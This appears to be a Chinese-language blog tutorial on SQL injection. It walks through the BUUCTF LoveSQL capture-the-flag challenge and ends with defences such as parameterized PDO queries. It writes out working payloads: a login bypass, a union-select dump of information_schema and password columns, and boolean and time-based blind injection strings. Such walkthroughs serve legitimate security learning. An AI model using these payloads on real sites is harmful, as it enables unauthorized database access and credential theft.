1. 初识SQL注入从登录框开始第一次接触SQL注入是在一个深夜我盯着那个简陋的登录界面发呆。用户名、密码、登录按钮就这么简单的三个元素却隐藏着整个数据库的大门。就像发现了一把能打开银行金库的钥匙只不过这把钥匙是用字符串拼出来的。SQL注入的本质很简单应用程序把用户输入的数据直接拼接到SQL查询语句中没有做任何过滤或转义。比如一个典型的登录验证SQL可能是这样的SELECT * FROM users WHERE username输入的用户名 AND password输入的密码当你在用户名框输入admin --时神奇的事情发生了。这个单引号闭合了原来的引号两个横杠注释掉了后面的内容SQL就变成了SELECT * FROM users WHERE usernameadmin -- AND password这就相当于直接查询用户名为admin的记录完全绕过了密码验证。我第一次成功时差点从椅子上跳起来原来那些看似坚固的系统背后竟有如此简单的突破口。2. 靶场实战LoveSQL通关指南2.1 环境准备与初步探测BUUCTF的LoveSQL靶场是个绝佳的练习场。打开题目映入眼帘的是个再普通不过的登录页面。我的第一反应是尝试经典的单引号测试用户名admin 密码任意页面返回了SQL语法错误这就像黑客电影里的门锁松动信号说明这里存在SQL注入漏洞。更令人兴奋的是当尝试万能密码 or 11 --时竟然直接登录成功了2.2 确定注入类型与字段数确认存在注入后下一步是判断字段数量。我使用了order by技术从1开始递增用户名a order by 1 -- 用户名a order by 2 -- 用户名a order by 3 --当测试到4时报错说明当前查询结果有3个字段。这个过程就像在黑暗中摸索门锁的结构每个反馈都在脑海中构建出SQL查询的轮廓。2.3 联合查询获取数据库信息知道字段数后就可以用联合查询来获取更多信息了。首先获取当前数据库的所有表名a union select 1,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),3 --返回结果显示有两个表geekuser和l0ve1ysq1。根据经验flag很可能藏在第二个表中。接着获取l0ve1ysq1表的列名a union select 1,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namel0ve1ysq1),3 --发现三个字段id、username和password。最后的冲刺就是查询password字段a union select 1,(select group_concat(password) from l0ve1ysq1),3 --这时页面显示了一堆数据右键查看源代码才找到真正的flag。这个过程就像在迷宫中一步步找到出口每个步骤都环环相扣。3. SQL注入的深层原理3.1 信息架构的利用SQL注入最强大的武器之一是information_schema数据库。这个系统数据库就像整个MySQL的地图包含了所有数据库、表、列的信息。通过查询这个数据库攻击者可以像查看图书馆目录一样浏览整个数据库结构。比如获取所有数据库名select group_concat(schema_name) from information_schema.schemata或者获取指定表的所有列select group_concat(column_name) from information_schema.columns where table_nameusers3.2 盲注与时间注入有时候页面不会直接显示查询结果这时就需要盲注技术。基于布尔的盲注通过观察页面返回的真假状态来推断数据admin and substring(database(),1,1)a --如果数据库名的第一个字母是a页面会正常返回否则会显示错误。更隐蔽的是时间盲注通过sleep函数观察响应延迟admin and if(substring(database(),1,1)a,sleep(3),0) --这些技术就像在黑暗中用回声定位虽然看不到目标但能通过反馈来判断环境。4. 防御措施与最佳实践4.1 参数化查询防止SQL注入最有效的方法是使用参数化查询预编译语句。以PHP为例$stmt $pdo-prepare(SELECT * FROM users WHERE username ? AND password ?); $stmt-execute([$username, $password]);这样用户输入会被当作数据处理而不是SQL代码的一部分。就像把信件装进信封再寄出邮差不会拆开看内容。4.2 其他防御手段除了参数化查询还有多层防御策略输入验证检查用户输入是否符合预期格式最小权限原则数据库用户只赋予必要的最低权限Web应用防火墙(WAF)过滤可疑的SQL关键字定期安全审计检查代码中的SQL拼接点记得有次我帮朋友检查他的网站发现一个搜索功能直接拼接SQL。当我演示如何通过注入获取管理员密码时他的表情从怀疑到震惊再到后怕那堂课比任何文档都印象深刻。
